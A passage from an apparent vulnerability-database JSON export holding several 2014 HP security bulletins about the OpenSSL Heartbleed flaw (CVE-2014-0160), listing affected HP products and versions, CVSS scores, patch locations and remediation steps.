COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268239\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268239\r\nVersion: 1\r\n\r\nHPSBMU03028 rev.1 - HP Matrix Operating Environment and CloudSystem Matrix\r\nSoftware Components running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Matrix\r\nOperating Environment and CloudSystem Matrix software components running\r\nOpenSSL. This is the OpenSSL vulnerability known as "Heartbleed" which could\r\nbe exploited remotely resulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101542\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Matrix Operating Environment and CloudSystem Matrix impacted software\r\ncomponent products and versions\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Onboard Administrator (OA) v4.11\r\n\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2\r\n\r\nHP Virtual Connect Firmware Smart Components installer software including HP\r\nBladeSystem c-Class Virtual Connect Support Utility (VCSU) v1.9.0 for Linux\r\nand Windows\r\n\r\nHP Systems Insight Manager v7.2, v7.2.1, v7.2.2, v7.3, and v7.3.1 bundled\r\nwith the following software:\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Matrix Operating\r\nEnvironment and CloudSystem Matrix software components in the following HP\r\nSecurity Bulletins.\r\n\r\nHP Matrix Operating Environment and CloudSystem Matrix Components\r\n HP Security Bulletin\r\n Security Bulletin Location\r\n\r\nHP Systems Insight Manager (SIM)\r\n HPSBMU03022\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04263236\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nWMI Mapper for HP Systems Insight Manager\r\n HPSBMU03013\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04260385\r\n\r\nHP Version Control Agent (VCA) and Version Control Repository Manager (VCRM)\r\non Linux and Windows,\r\n HPSBMU03020\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04262472\r\n\r\nHP Insight Control server migration software components\r\n HPSBMU03029\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04268240\r\n\r\nHP Insight Control server deployment\r\n HPSBMU03024\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04267749\r\n\r\nHP Onboard Administrator (OA)\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP Virtual Connect Firmware Smart Components Installer Software\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgkMACgkQ4B86/C0qfVk4uQCdF+q0r5FULEhsxi1b0Io6aYAq\r\n7JMAoIbGBlJ/tgvkIXGEklbniV3Gy/SC\r\n=O4Az\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03028 rev.1 - HP Matrix Operating Environment and CloudSystem Matrix Software Components running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30520", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30520", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 2\r\n\r\nHPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-29\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for HP Version Control\r\nAgent (VCA) and Version Control Repository Manager (VCRM).\r\n\r\nNote: OpenSSL has been updated 1.0.1g in these updates.\r\n\r\nProduct version/Platform\r\n Download Location (Web or FTP)\r\n\r\nHP Version Control Agent v7.3.2 for Windows x86\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5d66a09b2e6a490e9a61950f21\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p639883427/v97218\r\n\r\nHP Version Control Agent v7.3.2 for Windows x64\r\n\r\nhttp://www.hp.com/swpublishing/MTX-bd3ae96c013346078625d38398\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p519919823/v97223\r\n\r\nHP Version Control Agent v7.3.2 for Linux\r\n\r\nhttp://www.hp.com/swpublishing/MTX-d517a8466f6341d38519b5277b\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-linux/p1174025843/v97276\r\n\r\nHP Version Control Repository Manager v7.3.2\r\n\r\nhttp://www.hp.com/swpublishing/MTX-5ee056c2b13449e8b7153e21a1\r\n\r\nftp://ftp.hp.com/pub/softlib2/software1/sc-windows/p283849675/v97269\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\nVersion:2 (rev.2) - 29 April 2014 Added Software update information\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNfxzMACgkQ4B86/C0qfVnxzgCfYGUWPnj9fMIXFN3Tt1d05Yhw\r\n9koAoN6wTZ3HPpXfoJnXOJwBa+A563SI\r\n=mvDg\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03020 rev.2 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30496", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04273303\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04273303\r\nVersion: 1\r\n\r\nHPSBST03027 rev.1 - HP StoreVirtual 4000 Storage and HP P4000 G2 Storage\r\nusing HP System Management Homepage (SMH) running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-02\r\nLast Updated: 2014-05-02\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreVirtual\r\n4000 Storage and HP P4000 G2 Storage using HP System Management Homepage\r\n(SMH) running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101537\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LeftHand OS version 11.0 for HP StoreVirtual 4000 Storage and HP P4000 G2\r\nStorage using HP System Management Homepage (SMH)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software patch available to resolve the\r\nvulnerability.\r\n\r\nPatch 40013 available through StoreVirtual Online Upgrades.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 2 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNjw0wACgkQ4B86/C0qfVkWrwCfXSXJVoS7rYwbspA/RHS30xWD\r\njQ8AoM9G/iNI3DRmJS+MS9iIq64WRTG+\r\n=2stF\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBST03027 rev.1 - HP StoreVirtual 4000 Storage and HP P4000 G2 Storage using HP System Management Homepage (SMH) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30530", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30530", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239374\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239374\r\nVersion: 1\r\n\r\nHPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises\r\nSoftware), Running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-15\r\nLast Updated: 2014-04-15\r\n\r\nPotential Security Impact: Remote disclosure of Information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP Autonomy WorkSite Server (on-premises\r\nsoftware) running OpenSSL. The vulnerability can be exploited to allow remote\r\ndisclosure of information.\r\n\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences:\r\nCVE-2014-0160 (SSRT101505)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Autonomy WorkSite Server v9.0 SP1 (on-premises software)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided an update to HP Autonomy WorkSite Server v9.0 SP1\r\n(on-premises software) that will address the OpenSSL vulnerability. https://w\r\norksitesupport.autonomy.com/worksite/Scripts/GetDoc.aspx?latest=0%26nrtid=!nr\r\ntdms:0:!session:10.253.1.101:!database:SUPPORT:!document:1351832,1\r\n\r\nNote: after applying the update, HP recommends these additional steps to\r\nassure the vulnerability is addressed.\r\n\r\nRevoke old key pairs that were just superseded\r\nChange all potentially affected passwords\r\nInvalidate all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within HP\r\nAutonomy WorkSite Server (on-premises Software). The bulletin does not apply\r\nto any other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 15 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP 